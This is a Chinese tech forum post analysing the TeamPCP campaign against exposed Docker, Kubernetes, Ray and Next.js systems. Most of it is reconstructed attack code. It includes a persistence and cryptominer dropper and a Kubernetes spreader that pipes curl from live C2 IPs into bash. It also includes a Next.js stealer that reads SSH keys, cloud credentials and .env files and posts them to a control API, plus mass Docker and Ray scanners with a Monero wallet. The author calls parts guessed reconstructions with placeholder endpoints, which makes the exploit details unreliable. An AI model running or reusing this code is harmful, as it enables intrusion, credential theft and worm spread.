找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

3234

积分

0

好友

429

主题
发表于 16 小时前 | 查看: 3| 回复: 0

TeamPCP 黑客团伙利用一系列自动化脚本,实现了从入侵、控制到扩散的完整攻击链。其攻击过程通常分为五个阶段:攻击准备、入口突破、加载首个恶意脚本、黑产服务安装以及最后的自动扩散。

为了提高隐蔽性并防止溯源,攻击者主要采取以下措施:

  • 利用 Telegram 群组频道进行动态发布、私聊指挥以及买卖窃取的数据或访问权限。
  • 利用 TOR (洋葱) 网络隐藏真实的服务器位置,用于托管 C2 面板和 Sliver 恶意软件下载页面,以降低被溯源和封禁的风险。

攻击团伙维护了两台 Sliver C2 下载服务器。攻击链通常从配置不当的 Docker 容器切入,通过自动扫描暴露的 Alpine 容器作为首个立足点。入侵成功后,会在目标容器内部署并执行核心脚本 proxy.sh。该脚本会进一步部署加密货币挖矿程序、安装持久化系统服务、后门,并从下载服务器拉取另外 4 个功能脚本,实现数据窃取和自动扩散。整个攻击架构如下图所示:

TeamPCP攻击流程图:通过Docker入侵并部署恶意服务

proxy.sh 脚本功能

proxy.sh 脚本作为主控脚本,执行后会同时开展多项工作,包括:在宿主机或容器内注册系统服务,实现持久化或更深层的控制;部署加密货币挖矿程序,利用被控环境的算力进行挖矿;部署后门(如 frps、gost、sliver),便于攻击者后续再次接入和控制;从两台服务器 (67.217.57.24044.252.85.168) 下载并投放次级脚本。

这些次级脚本文件包括:

  • kube.shkube.py: 用于 Kubernetes 环境横向移动。
  • react.py: 针对 React/Next.js 应用的利用与数据窃取。
  • pcpcat.pyteampcp.py: 用于扫描与部署。
  • redis-deploy.py: 针对 Redis 的利用。
  • scanner.py: 用于发现新目标。

proxy.sh 的核心内容如下:

#!/bin/sh
# =============================================================================
# proxy.sh - TeamPCP 攻击链主控脚本
# 功能:① 安装系统服务 ② 部署加密货币挖矿程序 ③ 部署后门 ④ 从下载服务器拉取并投放脚本
# =============================================================================

# 两台下载服务器(图中与报告一致)
SRV1="http://67.217.57.240:666"
SRV2="http://44.252.85.168:666"
FILES="${SRV2}/files"
# 工作目录:宿主机或容器内可写路径
dir="${dir:-/tmp/teampcp}"
mkdir -p "$dir" 2>/dev/null

# ---------- ④ 从下载服务器拉取并投放脚本(先拉取,后续会用到) ----------
# 图中:从 67.217.57.240、44.252.85.168 下载并投放到当前环境
fetchScript() {
  _url="$1"
  _name="$2"
  curl -fsSL "$_url" -o "${dir}/${_name}" 2>/dev/null && chmod +x "${dir}/${_name}" 2>/dev/null
}
fetchScript "${FILES}/kube.py"       "kube.py"
fetchScript "${FILES}/react.py"     "react.py"
fetchScript "${FILES}/teampcp.py"    "teampcp.py"
fetchScript "${FILES}/pcpcat.py"     "pcpcat.py"
fetchScript "${FILES}/redis-deploy.py" "redis-deploy.py"
fetchScript "${FILES}/scanner.py"    "scanner.py"

# ---------- ① 安装系统服务(宿主机或容器内注册,实现持久化或更深层控制) ----------
installSystemServices() {
  if [ ! -d /etc/systemd/system ]; then
    return
  fi
  # 1) PCPcat React 扫描器服务
  cat > /etc/systemd/system/teampcp-react.service << SVCEOF
[Unit]
Description=PCPcat React Scanner
After=network.target
[Service]
Type=simple
WorkingDirectory=${dir}
ExecStart=/usr/bin/python3 ${dir}/react.py
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
SVCEOF
  systemctl daemon-reload 2>/dev/null
  systemctl enable teampcp-react.service 2>/dev/null
  systemctl start teampcp-react.service 2>/dev/null
  if [ -f "${dir}/scanner.py" ]; then
    cat > /etc/systemd/system/teampcp-scanner.service << SVCEOF2
[Unit]
Description=PCPcat Scanner
After=network.target
[Service]
Type=simple
WorkingDirectory=${dir}
ExecStart=/usr/bin/python3 ${dir}/scanner.py
Restart=always
RestartSec=120
[Install]
WantedBy=multi-user.target
SVCEOF2
    systemctl daemon-reload 2>/dev/null
    systemctl enable teampcp-scanner.service 2>/dev/null
    systemctl start teampcp-scanner.service 2>/dev/null
  fi
}
installSystemServices

# ---------- ② 部署加密货币挖矿程序(利用被控环境算力进行挖矿) ----------
deployCryptominer() {
  _url="${FILES}/BORING_SYSTEM"
  _out="${dir}/BORING_SYSTEM"
  curl -fsSL "$_url" -o "$_out" 2>/dev/null || true
  if [ -f "$_out" ]; then
    chmod +x "$_out" 2>/dev/null
    ( "$_out" & ) 2>/dev/null
  fi
  _miner_url="${FILES}/mine.sh"
  _miner_out="${dir}/mine.sh"
  curl -fsSL "$_miner_url" -o "$_miner_out" 2>/dev/null || true
  if [ -f "$_miner_out" ]; then
    chmod +x "$_miner_out" 2>/dev/null
    ( sh "$_miner_out" & ) 2>/dev/null
  fi
}
deployCryptominer

# ---------- ③ 部署后门(便于攻击者后续再次接入与控制) ----------
deployBackdoor() {
  for _base in "$SRV1" "$SRV2"; do
    _frps="${_base}/files/frps"
    _gost="${_base}/files/gost"
    _sliver="${_base}/files/sliver"
    for _url in "$_frps" "$_gost" "$_sliver"; do
      _name=$(basename "$_url")
      _path="${dir}/${_name}"
      curl -fsSL "$_url" -o "$_path" 2>/dev/null && chmod +x "$_path" 2>/dev/null && ( "$_path" & ) 2>/dev/null
    done
  done
}
deployBackdoor

# ---------- K8s 环境检测:若在集群内则拉取并执行 kube.py(横向移动) ----------
if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
  fetchScript "${FILES}/kube.py" "k8s.py"
  [ -f "${dir}/k8s.py" ] && python3 "${dir}/k8s.py" 2>/dev/null &
fi

# ---------- ④ 续:拉取脚本后,在后台启动扫描/发现类脚本(发现新目标) ----------
[ -f "${dir}/teampcp.py" ] && ( python3 "${dir}/teampcp.py" & ) 2>/dev/null
[ -f "${dir}/pcpcat.py" ]  && ( python3 "${dir}/pcpcat.py" & ) 2>/dev/null
[ -f "${dir}/redis-deploy.py" ] && ( python3 "${dir}/redis-deploy.py" & ) 2>/dev/null

kube.py 脚本功能

kube.py 脚本的作用是,当 proxy.sh 检测到当前处于 K8s 环境时,将其拉取并执行,实现在集群内的横向移动与持久化。其行为包括:

  1. 利用集群内的 serviceaccount 等凭据,通过 K8s API 枚举 namespacepod 等资源。
  2. 对每个 pod 调用 exec 接口,在容器内执行 curl -fsSL <PROXY_URL> | bash 命令(即再次拉取并执行 proxy.sh),从而将整个集群变成一个可自我扩散的“扫描/代理网络”。
  3. 在集群中部署 DaemonSet(例如命名为 system-monitor,放在 kube-system 命名空间),实现持久化与宿主机级别的控制。

该脚本的核心内容如下:

# -*- coding: utf-8 -*-
# =============================================================================
# kube.py - TeamPCP K8s 集群内横向移动与持久化
# =============================================================================

import urllib.request
import ssl

PROXY_URL = "http://44.252.85.168:666/files/proxy.sh"

def spread_to_pods():
    """对每个 pod 调用 exec,在容器内执行 curl proxy.sh | bash"""
    for pod in pods:
        try:
            pod_name = pod['metadata']['name']
            namespace = pod['metadata']['namespace']
            exec_url = f"{api_url}/api/v1/namespaces/{namespace}/pods/{pod_name}/exec"
            exec_url += f"?command=sh&command=-c&command=curl+-fsSL+{PROXY_URL}+|+bash"
            exec_url += "&stdout=true&stderr=true"
            req = urllib.request.Request(exec_url, method='POST')
            with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
                pass
            continue
        except Exception as e:
            continue

# ----  DaemonSet:在每节点部署特权Pod,挂载宿主机并再次拉取proxy.sh ----
daemonset = {
    "apiVersion": "apps/v1",
    "kind": "DaemonSet",
    "metadata": {
        "name": "system-monitor",
        "namespace": "kube-system"
    },
    "spec": {
        "selector": {
            "matchLabels": {
                "app": "system-monitor"
            }
        },
        "template": {
            "metadata": {
                "labels": {
                    "app": "system-monitor"
                }
            },
            "spec": {
                "hostNetwork": True,
                "hostPID": True,
                "containers": [
                    {
                        "name": "monitor",
                        "image": "alpine:latest",
                        "command": [
                            "sh",
                            "-c",
                            "apk add curl bash python3 >/dev/null 2>&1; "
                            "curl -fsSL " + PROXY_URL + " | bash; "
                            "sleep infinity"
                        ],
                        "securityContext": {
                            "privileged": True
                        },
                        "volumeMounts": [
                            {
                                "name": "host",
                                "mountPath": "/host"
                            }
                        ]
                    }
                ],
                "volumes": [
                    {
                        "name": "host",
                        "hostPath": {
                            "path": "/"
                        }
                    }
                ]
            }
        }
    }
}

react.py 脚本功能

react.py 脚本专门针对存在 CVE-2025-29927(即 React2Shell 漏洞)的 React/Next.js 应用,实现远程命令执行、窃取敏感数据并投递下一阶段载荷。具体行为包括:

  1. 从攻击者控制的 API 拉取目标域名列表。
  2. 构造特制的 Next.js 请求(如 multipart 表单与框架相关头部),触发服务端命令执行,并通过重定向元数据等方式取回命令输出。
  3. 执行成功后,在目标主机上运行一系列命令以收集信息,包括:环境变量、.env 类配置文件、Git 凭据、多用户 SSH 密钥、云厂商凭据以及基础主机信息等,并将窃取的数据回传到控制 API。
  4. 数据窃取完成后,尝试投递二级载荷:根据目标操作系统,通过 apk/apt/yum/curl/wget/python 等方式下载并执行远程脚本,用于建立持久化或代理。

其还原后的脚本内容如下:

# -*- coding: utf-8 -*-
# 功能摘要:
# - 从中心 API 拉取目标域名,利用 CVE-2025-29927 实现远程命令执行
# - 通过特制 Next.js 请求(multipart + 框架头)触发服务端执行,经重定向元数据取回输出
# - 窃取 .env、环境变量、Git 凭据、SSH 密钥、云凭据、主机信息并回传至同一控制 API
# - 成功后按目标 OS(apk/apt/yum)下载并执行远程脚本,建立持久化或代理
# =============================================================================

import urllib.request
import urllib.error
import ssl
import json
import re

# control_host 可能同时提供:目标列表、回传接收、二级载荷
CONTROL_BASE = "http://44.252.85.168:666"
TARGETS_API = f"{CONTROL_BASE}/api/targets"   # 拉取目标域名列表
EXFIL_API = f"{CONTROL_BASE}/api/exfil"        # 回传窃取数据
PAYLOAD_URL = f"{CONTROL_BASE}/files/proxy.sh" # 二级载荷,用于持久化或代理

# 忽略 SSL 校验证书
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

def getTargets():
    # getTargets - 从中心 API 拉取待攻击域名列表
    try:
        req = urllib.request.Request(TARGETS_API)
        with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
            data = resp.read().decode("utf-8", errors="ignore")
            # 假定返回 JSON 数组或每行一域名的文本
            try:
                return json.loads(data)
            except json.JSONDecodeError:
                return [line.strip() for line in data.splitlines() if line.strip()]
    except Exception:
        return []

def runRemoteCmd(domain, cmd, baseUrl=None):
    # runRemoteCmd - 在目标域名上通过 React2Shell 执行命令并取回输出
    # 参数: domain 目标域名, cmd 要执行的 shell 命令, baseUrl 可选(如 https://domain.com)
    # 返回: 命令输出文本,失败返回 None
    baseUrl = baseUrl or ("https://" + domain if not domain.startswith("http") else domain)
    # CVE-2025-29927(React2Shell):构造特制 Next.js 请求
    # 报告中:multipart form data + framework-specific headers,触发服务端执行,经 redirect 元数据取回输出
    # 真实漏洞端点、表单字段名及输出回传方式未公开,以下为依描述还原的合理结构
    url = baseUrl.rstrip("/") + "/api/route"  # 占位;实际路径依 Next.js 与漏洞端点而定
    payload = (
        b'------WebKitFormBoundary\r\n'
        b'Content-Disposition: form-data; name="field"; filename="x"\r\n\r\n'
        + cmd.encode("utf-8") + b'\r\n------WebKitFormBoundary--'
    )
    req = urllib.request.Request(
        url,
        data=payload,
        method="POST",
        headers={
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        },
    )
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
            # 若输出在响应体则直接读;若在 Location 或自定义头则需解析
            body = resp.read().decode("utf-8", errors="ignore")
            # 尝试从重定向或响应中提取输出(示例:可能编码在 Location 或 JSON 中)
            match = re.search(r"output=([^&\s]+)", body) or re.search(r'"output"\s*:\s*"([^"]*)"', body)
            if match:
                return urllib.request.unquote(match.group(1))
            return body[:8192] if body else None
    except urllib.error.HTTPError as e:
        # 部分利用链可能通过错误页或 302 携带输出
        if e.code == 302 and e.headers.get("Location"):
            return e.headers.get("Location", "")
        return e.read().decode("utf-8", errors="ignore")[:8192] if e.fp else None
    except Exception:
        return None

def getHarvestCommands():
    # getHarvestCommands - 返回用于窃取敏感数据的命令列表(每条在目标上执行后取回输出)
    return [
        "cat .env .env.local .env.* 2>/dev/null",
        "printenv",
        "git config --list 2>/dev/null",
        "cat /root/.ssh/id_rsa /root/.ssh/id_ed25519 /home/*/.ssh/id_rsa /home/*/.ssh/id_ed25519 2>/dev/null",
        "cat /root/.aws/credentials /home/*/.aws/credentials 2>/dev/null",
        "cat /root/.config/gcloud/credentials.json /home/*/.config/gcloud/*.json 2>/dev/null",
        "hostname; uname -a; id; whoami",
    ]

def harvestAndExfil(domain, runCmd):
    # harvestAndExfil - 在已取得 RCE 的目标上执行窃取命令,并将结果回传至控制 API
    # 参数: domain 当前目标域名, runCmd 可调用 runRemoteCmd(domain, cmd) 的函数
    results = {"domain": domain, "harvest": {}}
    for i, cmd in enumerate(getHarvestCommands()):
        out = runCmd(cmd)
        if out:
            results["harvest"]["cmd_%d" % i] = out[:65535]
    if not results["harvest"]:
        return
    try:
        data = json.dumps(results).encode("utf-8")
        req = urllib.request.Request(
            EXFIL_API,
            data=data,
            method="POST",
            headers={"Content-Type": "application/json"},
        )
        urllib.request.urlopen(req, context=ctx, timeout=30)
    except Exception:
        pass

def deploySecondary(domain, runCmd):
    # deploySecondary - 在目标上下载并执行远程脚本,建立持久化或访问代理
    # 报告中:通过 apk/apt/yum/curl/wget/python 等按 OS 选择方式下载执行
    bootstrap = (
        "apk add --no-cache curl 2>/dev/null || apt-get install -y curl 2>/dev/null || yum install -y curl 2>/dev/null; "
        "curl -fsSL '%s' | sh 2>/dev/null || wget -qO- '%s' | sh 2>/dev/null || python3 -c \"import urllib.request; exec(urllib.request.urlopen('%s').read().decode())\" 2>/dev/null"
    ) % (PAYLOAD_URL, PAYLOAD_URL, PAYLOAD_URL)
    runCmd(bootstrap)

def main():
    # main - 主流程:拉取目标 → 利用 React2Shell 执行命令 → 窃取并回传 → 投递二级载荷
    targets = getTargets()
    for domain in targets:
        if not domain:
            continue
        # 探测是否可利用:执行 id 或 echo
        out = runRemoteCmd(domain, "id")
        if not out:
            out = runRemoteCmd(domain, "echo 1")
        if out:
            harvestAndExfil(domain, lambda cmd: runRemoteCmd(domain, cmd))
            deploySecondary(domain, lambda cmd: runRemoteCmd(domain, cmd))

if __name__ == "__main__":
    main()

以下是 TeamPCP 在攻击中实际窃取到的部分数据截图示例:

TeamPCP窃取的数据文件列表截图

pcpcat.py 脚本功能

pcpcat.py 脚本的主要作用是在互联网上进行大规模扫描,发现暴露的 Docker API 和 Ray 管理界面,并自动部署恶意容器或 Ray 任务,实现类似“云蠕虫”的扩散。其行为包括:

  1. 从公网或 GitHub(例如 DeadCatx3 的仓库)等来源拉取大量的 CIDR 地址块,对大量 IP 地址进行并行扫描(主要针对常见的 Docker、Ray 端口)。
  2. 校验发现的端点是否真的可以被利用(例如未授权的管理 API),然后通过 API 远程创建恶意负载。
  3. 针对 Docker:拉取 Alpine 镜像,启动具有 宿主机网络模式自动重启 策略的容器,并在容器内拉取并执行远程脚本(与 proxy.sh 的拉取命令一致)。
  4. 针对 Ray:向 Ray dashboard 提交任务,执行经过 base64 编码的引导载荷(可能包含挖矿等恶意行为)。

其参考代码如下:

# -*- coding: utf-8 -*-
# =============================================================================
# pcpcat.py - TeamPCP 大流量互联网扫描与部署:发现暴露的 Docker API / Ray,并自动部署恶意容器或任务
# 根据“Analysis of pcpcat.py”功能描述还原:大规模发现、自动校验、无交互部署、重启策略持久化
# =============================================================================
# 设计:云蠕虫式——将配置不当的编排端点转化为分布式立足点,无需凭据,仅利用暴露的管理接口
# =============================================================================

import urllib.request
import urllib.error
import ssl
import json
import socket
import ipaddress
import base64
import concurrent.futures

# 拉取并执行 proxy.sh 的地址(与 proxy.sh、scanner 一致)
PROXY_SCRIPT_URL = "http://67.217.57.240:666/files/proxy.sh"
PROXY_SCRIPT_URL_ALT = "http://44.252.85.168:666/files/proxy.sh"

# 公网 CIDR 来源(图中:从 public provider lists 获取大量 CIDR)
# 示例:云厂商公布的 IP 段或 DeadCatx3 等列表
CIDR_SOURCES = [
    "https://raw.githubusercontent.com/DeadCatx3/cidr/main/cidr.txt",
    # 可扩展:AWS/GCP/Azure 等 IP 范围 JSON
]
FALLBACK_CIDRS = ["0.0.0.0/0"]

# Docker / Ray 常见端口
DOCKER_PORTS = [2375, 2376]
RAY_PORTS = [8265, 6379]

# 并行扫描线程数
MAX_WORKERS = 64
CONNECT_TIMEOUT = 2
API_TIMEOUT = 5

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

def get_docker_startup_script():
    """返回在容器内拉取并执行 proxy.sh 的 shell 脚本(与野外样本一致)。"""
    return f'''/bin/sh
echo "https://t.me/Persy_PCP was here
https://t.me/teampcp"
apk add --no-cache curl bash python3 >/dev/null 2>&1
curl -fsSL "{PROXY_SCRIPT_URL}" | bash
'''

def deploy_to_docker(ip, port):
    """
    对暴露的 Docker API (ip:port) 部署恶意容器。
    行为:拉取 Alpine 镜像,启动宿主机网络、自动重启的容器,容器内拉取并执行远程脚本(proxy.sh)。
    """
    endpoint = f"{ip}:{port}"
    base_url = f"http://{ip}:{port}"
    script = get_docker_startup_script().strip().replace("\n", " ")
    body = {
        "Image": "alpine:latest",
        "Cmd": ["/bin/sh", "-c", script],
        "HostConfig": {
            "NetworkMode": "host",
            "RestartPolicy": {"Name": "always"},
        },
    }
    try:
        req = urllib.request.Request(
            f"{base_url}/containers/create",
            data=json.dumps(body).encode(),
            method="POST",
            headers={"Content-Type": "application/json"},
        )
        with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp:
            create_res = json.loads(resp.read().decode())
        cid = create_res.get("Id")
        if not cid:
            return False
        start_req = urllib.request.Request(
            f"{base_url}/containers/{cid}/start",
            data=b"",
            method="POST",
        )
        urllib.request.urlopen(start_req, context=ctx, timeout=API_TIMEOUT)
        return True
    except Exception:
        return False

def get_ray_bootstrap_b64():
    """返回 Ray 任务中执行的 base64 引导载荷"""
    # 占位:解码后可为拉取 proxy.sh 或挖矿脚本;真实样本中为完整编码
    script = "import urllib.request, ssl; ctx=ssl.create_default_context(); ctx.check_hostname=False; ctx.verify_mode=0; exec(urllib.request.urlopen('" + PROXY_SCRIPT_URL + "', context=ctx).read().decode())"
    return base64.b64encode(script.encode()).decode()

def deploy_to_ray(ip, port):
    """
    向 Ray dashboard 提交任务,执行 base64 编码的引导载荷。
    Ray 常见 API:POST /api/jobs 或 /api/serve/applications 等,此处为占位路径。
    """
    base_url = f"http://{ip}:{port}"
    bootstrap_b64 = get_ray_bootstrap_b64()
    # Ray 1.x / 2.x 提交 job 的请求体格式因版本而异,此处为合理推测
    body = {
        "entrypoint": f"python3 -c \"import base64; exec(base64.b64decode('{bootstrap_b64}').decode())\"",
        "runtime_env": {},
    }
    try:
        for path in ["/api/jobs", "/api/version", "/"]:
            req = urllib.request.Request(
                f"{base_url}{path}",
                data=json.dumps(body).encode(),
                method="POST",
                headers={"Content-Type": "application/json"},
            )
            try:
                with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp:
                    if resp.getcode() in (200, 201, 202):
                        return True
            except urllib.error.HTTPError as e:
                if e.code in (200, 201, 202):
                    return True
    except Exception:
        pass
    return False

def fetch_cidr_blocks():
    """从公网 provider 列表获取大量 CIDR(图中:acquires massive CIDR blocks from public provider lists)。"""
    all_cidrs = []
    for url in CIDR_SOURCES:
        try:
            req = urllib.request.Request(url)
            with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
                text = resp.read().decode("utf-8", errors="ignore")
                for line in text.splitlines():
                    line = line.strip()
                    if line and not line.startswith("#"):
                        all_cidrs.append(line)
        except Exception:
            continue
    return all_cidrs if all_cidrs else FALLBACK_CIDRS

def expand_cidr(cidr, limit=2048):
    """将 CIDR 展开为 IP 列表,限制数量以控制扫描规模。"""
    try:
        net = ipaddress.ip_network(cidr, strict=False)
        return [str(ip) for ip in list(net.hosts())[:limit]]
    except Exception:
        return []

def check_port(ip, port):
    """检测 ip:port 是否开放。"""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(CONNECT_TIMEOUT)
        r = s.connect_ex((ip, port))
        s.close()
        return r == 0
    except Exception:
        return False

def verify_docker(ip, port):
    """校验是否为可滥用的未授权 Docker API。"""
    try:
        req = urllib.request.Request(f"http://{ip}:{port}/version")
        with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp:
            return resp.getcode() == 200
    except Exception:
        return False

def verify_ray(ip, port):
    """校验是否为可用的 Ray dashboard / API。"""
    try:
        req = urllib.request.Request(f"http://{ip}:{port}/")
        with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp:
            return resp.getcode() in (200, 401, 403)
    except Exception:
        return False

def scan_one(args):
    """单任务:对 (ip, port, kind) 做端口与 API 校验,返回可攻击目标。"""
    ip, port, kind = args
    if not check_port(ip, port):
        return None
    if kind == "docker" and verify_docker(ip, port):
        return (ip, port, "docker")
    if kind == "ray" and verify_ray(ip, port):
        return (ip, port, "ray")
    return None

def main():
    # 1) 大规模发现:获取 CIDR,展开为大量 IP,并行扫描 Docker / Ray 端口
    cidrs = fetch_cidr_blocks()
    tasks = []
    for cidr in cidrs:
        for ip in expand_cidr(cidr):
            for port in DOCKER_PORTS:
                tasks.append((ip, port, "docker"))
            for port in RAY_PORTS:
                tasks.append((ip, port, "ray"))

    found = []
    with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as ex:
        for res in concurrent.futures.as_completed([ex.submit(scan_one, t) for t in tasks]):
            try:
                r = res.result()
                if r:
                    found.append(r)
            except Exception:
                pass

    # 2) 无交互部署:对每个验证通过的目标调用对应部署逻辑,持久化依赖 restart policy(Docker)/ job(Ray)
    for ip, port, kind in found:
        if kind == "docker":
            deploy_to_docker(ip, port)
        elif kind == "ray":
            deploy_to_ray(ip, port)

if __name__ == "__main__":
    main()

scanner.py 脚本功能

scanner.py 脚本主要用于发现互联网上配置不当的 Docker API 与 Ray dashboard,并可选择部署恶意负载或挖矿程序。其行为包括:

  1. 从 GitHub 账号 DeadCatx3 等处下载 CIDR 列表,用于定义扫描的目标网段。
  2. 包含与 pcpcat.py 类似的 Docker 部署逻辑:生成拉取并执行 proxy.sh 的启动脚本(与野外容器内执行的命令一致),并对指定的 ip:port 进行部署。
  3. “boring” 服务器选项:如果启用,则会投递经过 base64 编码的引导脚本;解码后为挖矿相关程序(如 XMRig)。

以下是脚本的部分参考代码:

# -*- coding: utf-8 -*-
# =============================================================================
# scanner.py - TeamPCP 扫描器:发现配置不当的 Docker API 与 Ray dashboard,并部署 proxy 或挖矿
# =============================================================================

import urllib.request
import urllib.error
import ssl
import json
import socket
import ipaddress
import threading
import base64

# 下载服务器(与 proxy.sh 一致)
PROXY_SCRIPT_URL = "http://67.217.57.240:666/files/proxy.sh"
# 备用
PROXY_SCRIPT_URL_ALT = "http://44.252.85.168:666/files/proxy.sh"

# DeadCatx3 GitHub:CIDR 列表(报告中未给出具体 repo 路径,此处为占位)
CIDR_LIST_URL = "https://raw.githubusercontent.com/DeadCatx3/cidr/main/cidr.txt"
# 若 GitHub 不可用,可使用内置或其它源
FALLBACK_CIDRS = ["0.0.0.0/0"]

# Docker / Ray 常见暴露端口
DOCKER_PORTS = [2375, 2376]
RAY_PORTS = [8265, 6379]

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# -----------------------------------------------------------------------------
# mine.sh 配置与用法(图中:XMRig 安装脚本)
# mine.sh 用法:./miner | ./miner uninstall | ./miner status | ./miner logs | ./miner run | --help | --version
# -----------------------------------------------------------------------------
MINE_CONFIG = {
    "WALLET_ADDRESS": "87ttvHnjsno56u3zJV26E6cu6Cfro8ASBSpmAzi6FzGp603KXsoB2r8aR2k82Pmg2SLWHtHCKjrHeHUcZUneqEBFRnkbaz5",
    "WORKER_NAME": "${WORKER_NAME:-$(hostname)}",
    "POOL_URL": "pool.supportxmr.com:443",
    "XMRIG_VERSION": "6.25.0",
    "CPU_PERCENT": "${CPU_PERCENT:-60}",
    "BINARY_NAME": "miner",
}

def get_docker_startup_script():
    """返回在 Docker 容器内拉取并执行 proxy.sh 的启动脚本(与野外样本一致)。"""
    return f'''/bin/sh
echo "https://t.me/Persy_PCP was here
https://t.me/teampcp"
apk add --no-cache curl bash python3 >/dev/null 2>&1
curl -fsSL "{PROXY_SCRIPT_URL}" | bash
'''

def deploy_to_docker(ip, port, use_boring=False):
    """
    对暴露的 Docker API (ip:port) 部署恶意容器。
    use_boring=True 时部署挖矿引导(base64 xmrig)而非 proxy.sh。
    """
    endpoint = f"{ip}:{port}"
    base_url = f"http://{ip}:{port}"
    if use_boring:
        # “boring” 服务器选项:投递 base64 编码的挖矿引导
        # 解码后执行会写入 /tmp/miner.b64 → base64 -d → chmod +x /tmp/miner → 执行
        bootstrap_b64 = get_bootstrap_b64_miner()
        cmd = ["/bin/sh", "-c", f"python3 -c \"import base64; exec(base64.b64decode('{bootstrap_b64}').decode())\""]
    else:
        script = get_docker_startup_script().strip().replace("\n", " ")
        cmd = ["/bin/sh", "-c", script]
    body = {
        "Image": "alpine:latest",
        "Cmd": cmd,
        "HostConfig": {
            "NetworkMode": "host",
            "RestartPolicy": {"Name": "always"},
        },
    }
    try:
        req = urllib.request.Request(
            f"{base_url}/containers/create",
            data=json.dumps(body).encode(),
            method="POST",
            headers={"Content-Type": "application/json"},
        )
        with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
            create_res = json.loads(resp.read().decode())
        cid = create_res.get("Id")
        if not cid:
            return False
        start_req = urllib.request.Request(
            f"{base_url}/containers/{cid}/start",
            data=b"",
            method="POST",
        )
        urllib.request.urlopen(start_req, context=ctx, timeout=5)
        return True
    except Exception:
        return False

def get_bootstrap_b64_miner():
    """
    返回“挖矿引导”的 base64 字符串
    此处返回占位或从远程拉取的b64,真实样本中为完整编码的引导脚本。
    """
    # 占位:一段仅写 /tmp/miner.b64 并解码执行的最小示例
    bootstrap_script = """
import base64, subprocess, os
p = os.environ.get('MINER_B64', '')
if p:
    open('/tmp/miner.b64', 'wb').write(base64.b64decode(p))
    subprocess.run(['sh', '-c', 'base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner && rm -f /tmp/miner.b64 && /tmp/miner'], check=False)
"""
    return base64.b64encode(bootstrap_script.encode()).decode()

def fetch_cidr_list():
    """从 GitHub DeadCatx3 拉取 CIDR 列表;失败则返回备用网段。"""
    try:
        req = urllib.request.Request(CIDR_LIST_URL)
        with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
            text = resp.read().decode("utf-8", errors="ignore")
            return [line.strip() for line in text.splitlines() if line.strip()]
    except Exception:
        return FALLBACK_CIDRS

def expand_cidr(cidr):
    """将单个 CIDR 展开为 IP 列表(示例中可限制数量以控制扫描规模)。"""
    try:
        net = ipaddress.ip_network(cidr, strict=False)
        return [str(ip) for ip in net.hosts()][:1024]
    except Exception:
        return []

def check_port(ip, port, timeout=2):
    """检测 ip:port 是否开放。"""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        r = s.connect_ex((ip, port))
        s.close()
        return r == 0
    except Exception:
        return False

def check_docker_api(ip, port):
    """检测是否为未授权 Docker API(简单 GET /version)。"""
    try:
        req = urllib.request.Request(f"http://{ip}:{port}/version")
        with urllib.request.urlopen(req, context=ctx, timeout=5) as resp:
            return resp.getcode() == 200
    except Exception:
        return False

def check_ray_dashboard(ip, port):
    """检测是否为 Ray dashboard(简单 GET)。"""
    try:
        req = urllib.request.Request(f"http://{ip}:{port}/")
        with urllib.request.urlopen(req, context=ctx, timeout=5) as resp:
            return resp.getcode() in (200, 401, 403)
    except Exception:
        return False

def scan_and_deploy(use_boring=False):
    """
    主流程:拉取 CIDR → 扫描 Docker / Ray 端口 → 对可用目标执行 deploy_to_docker(或 Ray)。
    use_boring=True 时对 Docker 目标部署挖矿引导(base64 xmrig),否则部署 proxy.sh。
    """
    cidrs = fetch_cidr_list()
    found = []
    for cidr in cidrs:
        for ip in expand_cidr(cidr):
            for port in DOCKER_PORTS:
                if check_port(ip, port) and check_docker_api(ip, port):
                    found.append((ip, port, "docker"))
            for port in RAY_PORTS:
                if check_port(ip, port):
                    found.append((ip, port, "ray"))
    for ip, port, kind in found:
        if kind == "docker":
            deploy_to_docker(ip, port, use_boring=use_boring)

def main():
    import sys
    use_boring = "--boring" in sys.argv
    scan_and_deploy(use_boring=use_boring)

if __name__ == "__main__":
    main()

总结与思考

TeamPCP 的攻击流程展示了现代自动化攻击的复杂性和危害性。攻击者通过组合利用配置不当的云原生组件(如 DockerKubernetes)、已知应用漏洞(如 React2Shell)以及公开的扫描列表,构建了一个高效且隐蔽的攻击自动化体系。这起事件再次提醒我们,云环境下的 安全 配置和持续监控至关重要。

对于广大开发者和运维人员而言,除了及时修复已知漏洞外,更应重视最小权限原则,避免将管理接口(如 Docker Daemon、K8s API Server、Ray Dashboard)直接暴露在公网,并实施严格的网络访问控制。定期审查系统日志和异常进程,也是及早发现此类入侵行为的关键。想要了解更多关于 云原生 安全实践和攻防技术的深度分析,欢迎持续关注 云栈社区 的相关内容分享。

(全文完)




上一篇:苹果折叠屏iPhone预计2026年秋季发布,或将配备5500mAh超大电池
下一篇:手搓开源 SpringBoot API 防护框架:防重+限流,一个注解搞定
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

